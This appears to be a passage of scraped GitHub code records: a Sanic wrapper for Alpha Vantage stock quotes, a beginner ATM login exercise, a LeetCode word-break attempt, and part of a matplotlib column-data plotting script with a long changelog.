stockQuoteDataBusiness.convertDictToStockQuoteDataList(timeStampsData)\n stockDataList = stockQuoteDataBusiness.getOnlyLastDailyData(stockDataList)\n return json(\n {\"alpha_vantage_data\" : [stock.toJSON() for stock in stockDataList]}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200\n )\n except:\n return json(\n {\"message\" : \"Muitas requisições em poco tempo, considere usar uma chave Premium.\"}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 400\n )\n\n# método para retornar a lista das 10 maiores empresas brasileiras salvas em banco\n# @param: nenhum\n# @output: companyList : um JSON contendo a lista das empresas com suas cotações e informações\n# de acordo com os valores salvos no banco \n@app.route(\"/get-top-10\", methods=[\"GET\"])\nasync def getTop10(request):\n try:\n companyList = await companyPersistence.getTop10Companies()\n return json(\n {\"empresas\" : [company.toJSON() for company in companyList]}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200,\n )\n except Exception as exceptMsg:\n return json(\n {\"erro\" : str(exceptMsg)}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 500,\n )\n\n# método para buscar a cotação de uma empresa dado o seu código reconhecido pela api do Alpha Vantage\n# @params: companySymbol: o símbolo que identifica a empresa para qual se quer a cotação\n# @output: um JSON contendo a cotação da empresa retornada pela api do Alpha Vantage\n@app.route(\"/get-company-stock/\", methods=[\"GET\"])\nasync def getCompanyStock(request, companySymbol : str):\n stockSchema = CompanyStockSchema(only = (\"companySymbol\",))\n try:\n stockSchema.load({\"companySymbol\" : companySymbol})\n except ValidationError as err:\n return json(\n {\"error\": err.messages},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=406,\n )\n\n parameters : str = \"\"\n function : str = \"GLOBAL_QUOTE\" #parâmetro para cotação de uma empresa pelo alpha vantage\n symbol : str = companySymbol #símbolo da empresa a ser consultada\n apiKey : str = config.getApiKey()\n \n #montando url para chamar a api do alpha vantage\n parameters = 
\"function=\" + function\n parameters += \"&symbol=\" + symbol\n parameters += \"&apikey=\" + apiKey\n\n response = requests.get('https://www.alphavantage.co/query?' + parameters)\n jsonResponse : dict = response.json() #em python, ao desserializar o json do response o objeto é do tipo dict\n try :\n schema = CompanyStockAlphaSchema()\n res = jsonResponse[\"Global Quote\"]\n stock = schema.load(res, unknown=EXCLUDE)\n return json(\n {\"stock\" : stock.toJSON()},\n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200\n )\n except Exception as exceptMsg:\n return json(\n {\"erros\": str(exceptMsg)},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=400\n )\n\n# método para salvar em banco os dados de cotação de uma empresa\n# @param: companyStock : um objeto que modela uma cotação de uma empresa\n# @output: ao final do método, se não houver nada errado a cotação da empresa com código especificado\n# na cotação recebeida terá seu valor salvo/alterado em banco\n@app.route(\"/update-company-stock\", methods=[\"PUT\", \"OPTIONS\"])\nasync def updateCompanyStock(request):\n if(request.method == \"PUT\"):\n try:\n stockSchema = CompanyStockSchema()\n stock = stockSchema.load(request.json)\n await companyPersistence.updateCompanyStock(stock)\n return json(\n {\"message\" : \"Sucesso\"},\n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200\n )\n except Exception as exceptMsg:\n print(\"Erro ao atualizar cotação da empresa\", str(exceptMsg))\n return json(\n {\"erros\": str(exceptMsg)},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=400,\n )\n if(request.method != \"OPTIONS\"):\n return json(\n {\"erros\": \"Método não permitido\"},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=405,\n )\n return json({\"message\" : \"Success\"}, status = 200)\n\n# Método para checar se um determinado valor de intervalo de tempo é válido\ndef validateTimeIntervalValue(value : int):\n if(value not in supportedTimeIntervals):\n raise Exception(\"O valor de intervalo (\" + str(value) + \") é inválido. 
Apenas os seguintes valores são suportados: \" + str(list(supportedTimeIntervals.keys())) + \".\")\n\n# Método para retornar o objeto referenciado da aplicação para que esta possa ser executada em outro módulo\ndef createApp():\n return app\n\n\n","repo_name":"TiagoSD22/AlphaVantageBVSP","sub_path":"Back-end/modules/api/alphaVantageWrapper.py","file_name":"alphaVantageWrapper.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"pt","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"42257140651","text":"# -*- coding: utf-8 -*-\n# __author__ = \"LXM\"\n# Date: 2018/4/15 0015\n\n# 主要文件 应该包含入口文件所需的函数\n\nfrom .util import print_red, print_blue, print_green\nfrom .auth import authenticate\nfrom .logger import access_log\nfrom atm import logics\n\nfeatrues = [\n (\"账户信息\", logics.view_account_info),\n (\"取款\", logics.with_draw),\n (\"还款\", logics.repay)\n]\n\n\ndef controller(user_obj):\n while True:\n for index, featrue in enumerate(featrues): # 循环结束后 feature保留最后一个值在作用域中\n print(index, featrue[0])\n print(\"输入exit退出\")\n choice = input(\"请选择序号\")\n if not choice: continue\n if choice.isdigit():\n choice = int(choice)\n print(featrues[choice][1], \"??\")\n if choice < len(featrues) and choice >= 0:\n featrues[choice][1](user_obj)\n if choice == \"exit\":\n exit(\"bye\")\n\n\ndef entrance():\n \"\"\"\n ATM程序交互入口\n :return:\n \"\"\"\n\n user_obj = { # 用户的内存信息 ,每一次操作内存信息都应该同步到数据文件中\n \"is_authenticated\": False,\n \"data\": None\n }\n\n retry_count = 0 # 用户连续登陆失败次数\n while user_obj[\"is_authenticated\"] is not True:\n account = input(\"\\033[1;34m 账号: \\033[0m\").strip()\n password = input(\"\\033[1;34m 密码: \\033[0m\").strip()\n # 需要一个验证账号并返回账号信息的函数 失败返回 None\n auth_data = authenticate(account, password)\n\n if auth_data:\n user_obj[\"is_authenticated\"] = True\n user_obj[\"data\"] = auth_data\n print_green(\"-----欢迎登陆-----\")\n\n # 记录日志\n # create_logger(\"log\")\n access_log.info(\"用户 '%s' 登录成功\" % (user_obj[\"data\"][\"id\"]))\n controller(user_obj)\n else:\n # 没有数据返回说明没有对应的账户信息\n print_red(\"用户名或密码错误,请重新输入\")\n\n retry_count += 1\n\n if retry_count == 3:\n msg = \"用户名或密码错误到达三次,退出程序\"\n print_red(msg)\n break\n","repo_name":"hhy5277/python-","sub_path":"例子/my_ATM(视频思路/atm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37804945862","text":"# Given a non-empty string s and a dictionary wordDict containing a list\n# of non-empty words, determine if s can be segmented into a space-separated\n# sequence of one or more dictionary words.\n# You may assume the dictionary does not contain duplicate words.\n\n# For example, given\n# s = \"leetcode\",\n# dict = [\"leet\", \"code\"].\n\n# Return true because \"leetcode\" can be segmented as \"leet code\".\n\n\n# Interesting TEST cases\n# \"cars\"\n# [\"car\",\"ca\",\"rs\"]\n# [\"c\",\"a\",\"rs\"]\n\n# \"abcd\"\n# [\"a\",\"abc\",\"b\",\"cd\"]\n\n\n#####################################\nclass Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: bool\n \"\"\"\n temp_dict = {}\n for word in wordDict:\n \tif word in temp_dict:\n \t\treturn True\n \telse:\n \t\tif s.find(word)!=-1:\n\t \t\ttemp_dict[self._remove_occurances(s,word)] = None\n return \"\" in temp_dict\n\n\n def _remove_occurances(self,s,word):\n while True:\n idx = s.find(word)\n if idx!=-1:\n s = s[0:idx] + s[idx+len(word):]\n if s==\"\" or idx==-1:\n 
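# e.g. _remove_occurances(\"leetcode\", \"leet\") -> \"code\"; removal repeats left to right until\n                # no occurrence remains. This greedy check can miss valid splits, e.g. the \"cars\"\n                # cases listed in the header comments.\n                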
break\n return s\n\n\ndef main():\n\td = {\"a\",\"abc\",\"b\",\"cd\"}\n\ts = \"abcd\"\n\tsol = Solution()\n\tprint(sol.wordBreak(s,d))\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"msaffarm/InterviewPrep","sub_path":"LeetCode/word_break.py","file_name":"word_break.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41960740477","text":"#!/usr/bin/python3\r\n# 2016-12-15 Sergio de la Barrera\r\n# - forked from plotmacdata.py\r\n# - 2017-01-19 added custom delimiter\r\n# - 2017-01-28 fixed column count to ignore whitespace columns created by extra delimiters\r\n# - 2017-01-31 added 'chain' option to allow plotting a series of files chained together in time\r\n# also added vertical option to force subplots to stack vertically\r\n# - 2017-02-02 added horizontal option, like vertical\r\n# also added 'arrows' option to indicate direction of sweeping data\r\n# - 2017-02-03 added glob function to allow expansion of filename wildcards\r\n# modified arrows to take optional argument of arrows length in data points\r\n# - 2017-03-24 added ymult option to scale y-values\r\n# - 2017-03-25 added active ymult to axis label\r\n# added logx option\r\n# - 2017-03-30 added number of rows to stdout\r\n# added interpolation feature for better symmetrization (and plotting limits)\r\n# added boxcar average feature\r\n# - 2017-04-04 added title for (anti)symmetrized panels\r\n# added sharey toggle to use same y-axis range\r\n# - 2017-04-05 added divcol, column to divide data by\r\n# - 2017-04-06 added yshift to allow constant shift of data before other computations\r\n# - 2017-04-08 added option to fold negative x-data into positive axis\r\n# - 2017-04-13 added option to superimpose all data in the same plot\r\n# enabled file/column specific ymult values: f1c1,f1c2;f2c1,f2c2;...\r\n# - 2017-06-01 added manual axis label options\r\n# - 2017-06-08 made legend draggable and moved legend options to rcParams\r\n# - 2017-06-12 allowed for files with differing number of columns (usecols must mutually exist)\r\n# added xlim option for manual axis zooming\r\n# integrated speedy2d colorplotting into speedyplot given two x-columns\r\n# added semicolon specification for different ycolumns from different files: f1y1,f1y2;f2y1f2y2;...\r\n# - 2017-06-13 added semicolon specification for different x-columns from different files: f1y1,f1y2;f2y1f2y2;...\r\n# added save command option to batch file (by pressing 'b' key)\r\n# - 2017-06-26 changed default delimiter value to None, which should still use whitespace unless specified otherwise\r\n# - 2017-06-29 corrected previous change to default delimiter value; now checks list of common delimiters until\r\n# totcols > 1 unless delimiter is explicitly specified; also seeks back to zero for 0 line file headers\r\n# - 2017-11-07 incorporated tight_layout() and font.size, mathtext.default rcParams\r\n# - 2018-01-12 added comma in list of trial delimiters and replaced row number replacement for first column of files with string columns to use np.genfromtxt(),\r\n# replacing the first column but leaving others as np.nan values\r\n# prints number of columns for each file\r\n# removed stripping of digits and underscores from column labels; now only left-strips '#'\r\n# created --list option to print column labels/headers and quit (useful for picking columns to plot)\r\n# - 2018-01-16 added -r option (\"combinecols\") which will perform RMS on two columns to produce magnitude of Re 
and Im parts of lock-in signal\r\n# also added a basic \"output\" function (mapped to \"o\" key) to save the plotted/manipulated data from the last column of last file\r\n# - 2018-01-26 added ability to invert x- or y-axes (e.g. for estimate of conductance)\r\n# extended yshifts to accept single argument and use that value to separate all curves as n*yshifts\r\n# remapped \"output\" function to \"e\" key (for \"export\") to prevent clash with \"o\" zoom toggle in view window\r\n# - 2018-01-30 fixed ylabel in combinecols mode to print sqrt(x^2 + y^2)\r\n# - 2018-02-07 added waterfall plot mode which shifts ydata by value of second x-axis with optional multiplier\r\n# - 2018-03-22 changed order of divcol and invert so columns are inverted last (allows conversion of V-->R-->conductance)\r\n# added optional argument for --marker which allows specification of marker size for both line and colorplots\r\n# added --square marker option\r\n# created --derivative option (specify columns or perform on all y-columns)\r\n# added --integrate option which uses cumulative trapezoidal summation\r\n# added basic --datetime capability specifically for reading special-measure output (ISO 8601 timestamps)\r\n# - 2018-03-23 implemented file number ranges using bash syntax e.g. {001..021} (zero padding conveys expected width of file numbers)\r\n# - 2018-03-27 extended xshift --> xshifts, allowing semicolon-separated list of shifts for multiple columns/files\r\n# same for xmult\r\n# - 2018-04-04 enabled individual colorplot colorbars with separate automatic scaling for each colorplot\r\n# added colorbar labels to colorplot axes\r\n# improved mode switching (added colorplot_mode, lineplot_mode to change behavior based on mode throughout)\r\n# fixed labeling system to start with defaults (col 1, col 2, ...), replace with header labels if available, then x, y, c labels for each if provided (using defaults or header labels otherwise)\r\n# added interpolation mode for colorplots\r\n# - 2018-04-05 added ylims option for manual y-axis zooming\r\n# fixed custom label truncation issue by using python list for labels until after manual label replacement\r\n# - 2018-04-09 extended crange to allow semicolon-separated values for different panels\r\n# fixed refresh handling of file_or_glob by moving call to within refresh loop (no longer used as pre-parser for command-line argument input)\r\n# - 2018-04-12 moved zeroy until after applying ymult\r\n# - 2018-04-16 moved raw 2D scatter plot to after main file loop, similar to interpolated plot, in order to obtain better colorscale limits\r\n# - 2018-04-17 added continue statement to skip empty data files; required empty elements to be added to data list and logic for handling those in concatenation\r\n# - 2018-04-26 enabled two-column datetime input, specified by \"-d c1,c2\" where c1 is date column, c2 time (in BlueFors format)\r\n# 2018-07-12 * added --deleterows option which masks selected rows (comma list) with NaN in plotted data\r\n# * added --lw (linewidth) option as well\r\n# 2018-07-13 created --monotonic option which deletes elements for which the sweep variable is non-monotonic (e.g. 
spikes in temperature)\r\n# 2018-08-02 modified order of fold+xnorm to follow xmult+xshifts (used to be reverse; present order allows a shift in fold origin)\r\n# 2018-08-03 created colorbyorder option to color curves according to colormap\r\n# 2018-08-13 * introduced engineering notation for axis tick labels\r\n# * fixed bug which did not display y-label when using datetime mode\r\n# * changed x-label to 'points' when plotting versus row number\r\n# * added timedelta (-t) plotting option, which operates similarly to datetime (-d) but versus elapsed time instead of absolute time\r\n# * made color iterable\r\n# * added nolegend option to prevent display of legend\r\n# 2018-08-21 * added xboxcar and x2boxcar to allow averaging of x-data (on both axes in colorplots)\r\n#\t\t\t\t* also moved boxcar averaging to occur before interpolation\r\n# 2018-08-29 changed colorplot xdata to a mutable reference instead of a copy; this allows xdata manipulation to propagate to colorplot section\r\n# 2018-09-05 gave colorbyorder an optional argument (cmap reference)\r\n# 2018-09-05 gave line an optional argument (linewidth)\r\n# 2018-09-16 added trimspikes to remove data spikes (2% deviation from rolling average, excluding self)\r\n# 2018-09-16 added traces mode which plots specified linecuts from first x-axis versus the second x-axis\r\n# 2018-09-16 added xdivcol (same functionality as divcol but for x-data)\r\n# 2018-09-16 added ifinlabels option: checks file header for presence of a specific string label and skips file if not present\r\n# 2018-12-11 edited trimspikes to allow multiple columns (comma-separated list)\r\n# 2019-01-06 added even/odd flags to select only even/odd numbers in file ranges specified with {..} notation\r\n# 2019-02-06 added 'orezy' option, which essentially works like zeroy, but uses the max value\r\n# 2019-02-27 changed csints to allow range specification with colon-slices (e.g. columns 1:9, or rows 100:1001)\r\n# 2019-03-21 added csigma option which sets colorplot crange to a multiple of the z-data standard deviation around the mean\r\n# 2020-08-04 added 1-dimensional FFT option\r\n# 2020-08-05 enabled automatic tex-detection of axis labels; inserts $...$ in labels with [{}_^] in string, excluding anything in (...) 
at end\r\n# added low-pass, high-pass, and band-pass filter options, specified by frequency (scalar for LP/HP, 2-tuple for BP) corresponding to FFT frequency domain\r\n# 2020-08-12 added masknegative option to set negative y-values to NaN (will not plot); NaN may be set to special color for interpolated data\r\n# 2020-08-13 added np.ma.masked_invalid() for colormap plotting in data loop (for correct limits) and plotting loop; also added logz option for colormaps\r\n# added figure size, font size, and dpi options for making nice figures\r\n# 2020-08-14 added x2mult and fixed bug in xmult that applied xmult^p to xdata if more than one y-column was being plotted (one factor for each panel)\r\n# 2020-09-27 added set_visible(False) condition for unused axes in n*m grid\r\n# 2021-02-16 added polynomialsubtract option to subtract an n-degree polynomial fit from each curve\r\n# 2023-02-14 added {start:stop} and {start:step:stop} syntax to options for file range specifiers\r\n# 2023-02-15 fixed logz, which broke due to new matplotlib handling of vmin, vmax in colormaps where normalization is also specified --> limits are not arguments of the normalization\r\n# added centeredz option which uses CenteredNorm()\r\n# added --quiet mode for suppressing file name list and other file-specific details\r\n#\r\n# * add better refresh, autoupdate\r\n# * static panel aspect ratio\r\n# * quit using np array for labels; use list\r\n\r\nimport numpy as np\r\nimport scipy.interpolate as sci\r\nimport scipy.integrate as scg\r\nimport scipy.signal as scs\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as mcm\r\nfrom matplotlib.ticker import EngFormatter\r\nfrom matplotlib.colors import LinearSegmentedColormap, LogNorm, Normalize, CenteredNorm\r\nimport itertools as it\r\nimport argparse, os, glob, re\r\nimport sys, datetime\r\n\r\ndef csints(string):\r\n if ':' in string:\r\n l = []\r\n for substring in string.split(','):\r\n if ':' in substring:\r\n r1, r2 = map(int, substring.split(':'))\r\n l.extend(range(r1, r2+1))\r\n else:\r\n l.append(int(substring))\r\n else:\r\n l = list(map(int, string.split(',')))\r\n return l\r\n\r\ndef csfloats(string):\r\n return list(map(float, string.split(',')))\r\n\r\ndef ssints(string):\r\n return list(map(csints, string.split(';')))\r\n\r\ndef ssfloats(string):\r\n return list(map(csfloats, string.split(';')))\r\n\r\ndef ssstrs(string):\r\n return list(map(str, string.split(';')))\r\n\r\ndef itstrs(string):\r\n return it.cycle(map(str, string.split(',')))\r\n\r\ndef file_or_glob(string):\r\n if os.path.isfile(string):\r\n fname = string\r\n else:\r\n pattern1 = r'{(\\d+)\\.\\.(\\d+)}'\r\n pattern2 = r'{(\\d+):(\\d+)}'\r\n pattern3 = r'{(\\d+):(\\d+):(\\d+)}'\r\n\r\n match1 = re.search(pattern1, string)\r\n match2 = re.search(pattern2, string)\r\n match3 = re.search(pattern3, string)\r\n\r\n if match1 or match2 or match3: # use file number range\r\n if match1:\r\n match = match1\r\n pattern = pattern1\r\n mstart, mstop = map(int, match.group(1,2))\r\n mstep = 1\r\n fnum_width = max(len(match.group(1)), len(match.group(2)))\r\n elif match2:\r\n match = match2\r\n pattern = pattern2\r\n # mgroup = match.group(1), match.group(2)\r\n mstart, mstop = map(int, match.group(1,2))\r\n mstep = 1\r\n fnum_width = max(len(match.group(1)), len(match.group(2)))\r\n else: # step between file numbers (e.g. 
{0:4:12} -> 0,4,8,12)\r\n match = match3\r\n pattern = pattern3\r\n # mgroup = match.group(1), match.group(3)\r\n # mstep = match.group(2) \r\n mstart, mstop, mstep = map(int, match.group(1,3,2))\r\n fnum_width = max(len(match.group(1)), len(match.group(3)))\r\n if mstart < mstop+1:\r\n fnum_range = range(mstart, mstop+1, mstep)\r\n else:\r\n fnum_range = range(mstart, mstop-1, -mstep)\r\n repl = '{{:0{}}}'.format(fnum_width)\r\n if args.even:\r\n strings = [re.sub(pattern, repl.format(fnum), string, count=1) for fnum in fnum_range if (fnum+1) % 2]\r\n elif args.odd:\r\n strings = [re.sub(pattern, repl.format(fnum), string, count=1) for fnum in fnum_range if fnum % 2]\r\n else:\r\n strings = [re.sub(pattern, repl.format(fnum), string, count=1) for fnum in fnum_range]\r\n fname = []\r\n for s in strings:\r\n fname.extend(glob.glob(s))\r\n else: # regular glob syntax\r\n fname = glob.glob(string)\r\n return fname\r\n\r\ndef on_key_press(event):\r\n if type(event.key) is str:\r\n if event.key == 'b':\r\n command_args = sys.argv.copy()\r\n command_args[0] = os.path.basename(command_args[0])\r\n batch_fname = os.path.splitext(command_args[0])[0] + '-' + datetime.datetime.now().strftime('%Y-%m-%d-%Hh%Mm%Ss') + '.bat'\r\n with open(batch_fname, 'w') as batch_f:\r\n print(' '.join(command_args), file=batch_f)\r\n print('command saved to --> {}'.format(os.path.join(os.getcwd(), batch_fname)))\r\n elif event.key == 'e':\r\n # saves a tab-delimited ascii file of plotted data\r\n # only makes sense for a single file one column\r\n command_args = sys.argv.copy()\r\n command_args[0] = os.path.basename(command_args[0])\r\n output_fname = os.path.join(os.path.dirname(fname), os.path.splitext(command_args[0])[0] + '-' + datetime.datetime.now().strftime('%Y-%m-%d-%Hh%Mm%Ss') + '-' + os.path.basename(fname))\r\n\r\n output_header = '{:>19}\\t{:>20}'.format(ax.get_xlabel(), ax.get_ylabel())\r\n output = np.column_stack((xdata, col))\r\n np.savetxt(output_fname, output, fmt='%20.12e', delimiter='\\t', newline='\\n', header=output_header, comments='#')\r\n print('saved data to -->', output_fname)\r\n if len(files) > 1 or len(args.usecols[0]) > 1:\r\n print('(only saves final column from last file)')\r\n elif event.key == 'r':\r\n plt.close()\r\n main()\r\n #main(event.canvas.figure)\r\n\r\n# Define input arguments\r\nparser = argparse.ArgumentParser(description='plot somewhat arbitrary data stored in ascii-format column data')\r\n#parser.add_argument('files', nargs='+', type=file_or_glob, help='input files')\r\nparser.add_argument('files', nargs='+', type=str, help='input files')\r\nparser.add_argument('--even', action='store_true', help='select only even number files in range, specified by {n1..n2} notation')\r\nparser.add_argument('--odd', action='store_true', help='select only odd number files in range, specified by {n1..n2} notation')\r\nparser.add_argument('--hysteresis', action='store_true', help='subtract every other curve')\r\nparser.add_argument('--header', type=int, default=1, help='number of header lines to skip', metavar='N')\r\nparser.add_argument('--listcols', action='store_true', help='print list of column headers or labels, if available (first file only)')\r\nparser.add_argument('--quiet', action='store_true', default=False, help='suppress printing file names and other file-specific details')\r\nparser.add_argument('-x', '--plotvs', type=ssints, default=[[0,]], help='column index or indices to plot against (zero-indexed)', metavar='COLS')\r\nparser.add_argument('-y', '--usecols', type=ssints, 
default=None, help='columns to plot', metavar='COLS')\r\nparser.add_argument('-r', '--combinecols', type=csints, default=None, help='x,y columns --> R = (x**2 + y**2)**0.5', metavar='X,Y')\r\nparser.add_argument('-d', '--datetime', nargs='?', default=False, const=(0,), type=csints, help='column index to interpret as datetime (replaces usual x-axis; combine two cols using comma list)', metavar='COL')\r\nparser.add_argument('-t', '--timedelta', nargs='?', default=False, const=(0,), type=csints, help='column index to interpret as datetime (replaces usual x-axis)', metavar='COL')\r\nparser.add_argument('--ifinlabels', type=str, default=None, help='filter file list based on check for a specific column header', metavar='STR')\r\nparser.add_argument('--crange', type=ssfloats, default=None, help='range of 2D data values (z-axis; can be semicolon list)')\r\nparser.add_argument('--csigma', type=float, default=None, help='multiple of z-axis stddev to use to set color range')\r\nparser.add_argument('--cmap', default=mcm.inferno, help='colormap for 2d plots')\r\nparser.add_argument('--cornplot', action='store_true', help='break up total field into parallel and perp components')\r\nparser.add_argument('--yshift', type=float, default=None, help='constant shift to y-data before other manipulations')\r\nparser.add_argument('--interpolate', type=ssfloats, default=False, metavar='X1,X2,Nx;Y1,Y2,Ny',\r\n help='limits and number of elements to interpolate with respect to plotting axis; single value uses data limits')\r\nparser.add_argument('--boxcar', type=int, default=False, help='perform boxcar average over N neighbors', metavar='N')\r\nparser.add_argument('--xboxcar', type=int, default=False, help='perform boxcar average on x-data over N neighbors', metavar='N')\r\nparser.add_argument('--x2boxcar', type=int, default=False, help='perform boxcar average on second x-axis of colorplot over N neighbors', metavar='N')\r\nparser.add_argument('--lorentz', type=int, default=False, help='perform lorentzian blur over N neighbors', metavar='N')\r\nparser.add_argument('--symmetrize', type=csints, default=[], metavar='COLS',\r\n help='columns to symmetrize; requires rows to be symmetric about zero and equally spaced')\r\nparser.add_argument('--antisymmetrize', type=csints, default=[], metavar='COLS',\r\n help='columns to antisymmetrize; requires rows to be symmetric about zero and equally spaced')\r\nparser.add_argument('--chain', action='store_true', help='chain time series plots together from multiple files')\r\nparser.add_argument('--line', nargs='?', type=float, default=1, const=True, help='plot solid lines (may also give linewidth)')\r\n#parser.add_argument('--marker', action='store_true', help='plot using point markers')\r\nparser.add_argument('--marker', nargs='?', default=False, const=True, type=int, help='plot using point markers (can take number argument which changes colorplot marker size; default s=200)')\r\nparser.add_argument('--square', action='store_true', help='plot using square markers')\r\n#parser.add_argument('--arrows', action='store_true', help='add arrows to indicate sweep direction')\r\nparser.add_argument('--arrows', nargs='?', default=False, const=1, type=int,\r\n help='add arrows to indicate sweep direction')\r\nparser.add_argument('--dashes', action='store_true', help='use dashes to indicate negative sweep direction')\r\nparser.add_argument('--fold', action='store_true', help='fold negative x-values into positive axis')\r\nparser.add_argument('--logx', action='store_true', help='use log scale 
on x-axis')\r\nparser.add_argument('--logy', action='store_true', help='use log scale on y-axis')\r\nparser.add_argument('--logz', action='store_true', help='use log scale on z-axis (color scale)')\r\nparser.add_argument('--centeredz', action='store_true', help='use a centered normalized scale on z-axis (color scale)')\r\nparser.add_argument('--xmult', type=ssfloats, default=None, help='multiplier to scale x-axes (can be list)')\r\nparser.add_argument('--x2mult', type=ssfloats, default=None, help='multiplier to scale second x-axes in colorplot mode')\r\nparser.add_argument('--xshifts', type=ssfloats, default=None, help='offset to shift x-axes (can be list; will cycle if fewer than number of files)')\r\nparser.add_argument('--xinvert', action='store_true', help='invert x-axis')\r\nparser.add_argument('--xlabel', type=str, default=None, help='manually specify x-axis label (string)')\r\nparser.add_argument('--ylabels', type=ssstrs, default=None, help='manually specify y-axis labels (string; semicolons for multiple axes)')\r\nparser.add_argument('--clabels', type=ssstrs, default=None, help='manually specify c-axis labels for colorplots (string; semicolons for multiple axes)')\r\nparser.add_argument('--divcol', type=int, default=None, help='divide all columns by the data in this column', metavar='COL')\r\nparser.add_argument('--xdivcol', type=int, default=None, help='divide x-column by the data in this column', metavar='COL')\r\nparser.add_argument('--normy', action='store_true', help='normalize y-data to range between zero and one')\r\nparser.add_argument('--xnorm', action='store_true', help='normalize x-data to range between zero and one')\r\nparser.add_argument('--ymult', type=ssfloats, default=None, help='multiplier to scale y-axes (can be list)')\r\nparser.add_argument('--zeroy', action='store_true', help='shift y-data down to zero by minimum value')\r\nparser.add_argument('--orezy', action='store_true', help='shift y-data to zero by MAXimum value')\r\nparser.add_argument('--meansubtract', action='store_true', help='shift y-data down to zero by average value')\r\nparser.add_argument('--polynomialsubtract', default=False, type=int, help='subtract an n-degree polynomial background from each curve', metavar='DEGREE')\r\nparser.add_argument('--yshifts', type=csfloats, default=None, help='constant shifts to y-data applied after other manipulations; list or single value (creates crude waterfall plot ordered by file sequence)')\r\nparser.add_argument('--waterfall', nargs='?', type=float, default=False, const=1, metavar='MULT', help='toggle waterfall plot; requires two x-columns; optional value specifies multiplier for y-separation')\r\nparser.add_argument('--traces', type=csfloats, default=None, metavar='VALS', help='trace/linecut mode; comma list of values (from x-axis 1) along which to plot traces (vs x-axis 2)')\r\nparser.add_argument('--derivative', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns to take derivative/central differences (wrt x-axis; can be list)')\r\nparser.add_argument('--integrate', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns to integrate (cumulative trapezoidal summation wrt x-axis; can be list)')\r\nparser.add_argument('--fft', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns on which to perform fast Fourier transform')\r\nparser.add_argument('--lpfilter', type=float, default=False, metavar='FREQ', help='perform a low-pass filter operation using the specified cutoff 
frequency')\r\nparser.add_argument('--hpfilter', type=float, default=False, metavar='FREQ', help='perform a high-pass filter operation using the specified cutoff frequency')\r\nparser.add_argument('--bpfilter', type=csfloats, default=False, metavar='FREQS', help='perform a band-pass filter operation between the specified cutoff frequencies')\r\nparser.add_argument('--invert', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns to invert (can be list)')\r\nparser.add_argument('--sharey', action='store_true', help='use same y-range in all panels')\r\n#parser.add_argument('--delimiter', type=str, default='\\t', help='delimiter separating columns')\r\nparser.add_argument('--delimiter', type=str, default=None, help='delimiter separating columns')\r\nparser.add_argument('--superimpose', action='store_true', help='draw all columns together')\r\nparser.add_argument('--vertical', action='store_true', help='draw subplots vertically')\r\nparser.add_argument('--horizontal', action='store_true', help='draw subplots horizontally')\r\nparser.add_argument('--xlim', type=csfloats, default=None, help='specified limits for x-axes')\r\nparser.add_argument('--ylims', type=ssfloats, default=None, help='specified limits for y-axes (can specify panel with semicolons)')\r\nparser.add_argument('--masknegative', nargs='?', type=str, default=False, const=True, metavar='COLOR', help='mask negative values in all loaded colormap data; can take color name for mask color if interpolated')\r\nparser.add_argument('--deleterows', type=csints, default=None, help='row numbers to delete (mask as NaN) in all loaded data (comma list)')\r\nparser.add_argument('--trimspikes', type=csints, default=None, help='column numbers to detect and remove data spikes (mask as NaN)')\r\nparser.add_argument('--monotonic', action='store_true', help='remove points with opposite sweep direction to the average (cuts data with non-monotonic direction in the x-variable)')\r\nparser.add_argument('-c', '--color', type=itstrs, default=None, help='override default line colors (may be comma list)')\r\nparser.add_argument('--colorbyorder', nargs='?', type=str, default=False, const=True, help='use colormap to define line colors based on order of files in list (may also give colormap name)')\r\nparser.add_argument('--lw', type=float, default=None, help='override default linewidth')\r\nparser.add_argument('--ls', type=itstrs, default=None, help='override default linestyles (may be comma list)')\r\nparser.add_argument('--nolegend', action='store_true', help='toggle display of legend')\r\nparser.add_argument('--size', type=csfloats, default=None, metavar='WIDTH,HEIGHT', help='figure size in inches')\r\nparser.add_argument('--dpi', type=float, default=None, metavar='DPI', help='dpi resolution for printed figure')\r\nparser.add_argument('--fontsize', type=float, default=12, metavar='POINTS', help='font size for labels')\r\nargs = parser.parse_args()\r\n\r\n# Plot settings\r\nmpl.rcParams['keymap.quit'] = 'q'\r\nmpl.rcParams['font.size'] = args.fontsize\r\nmpl.rcParams['font.family'] = 'serif'\r\nmpl.rcParams['mathtext.default'] = 'regular'\r\n\r\nmpl.rcParams['legend.fontsize'] = 10\r\nmpl.rcParams['legend.numpoints'] = 1\r\nmpl.rcParams['legend.handletextpad'] = 0.3\r\nmpl.rcParams['legend.frameon'] = False\r\n\r\nmpl.rcParams['lines.linewidth'] = 2\r\nlineprops = dict(ls='none', marker='.')\r\nif args.square:\r\n lineprops['marker'] = 's'\r\nif args.line:\r\n lineprops['ls'] = '-'\r\n if not args.marker:\r\n lineprops['marker'] = 
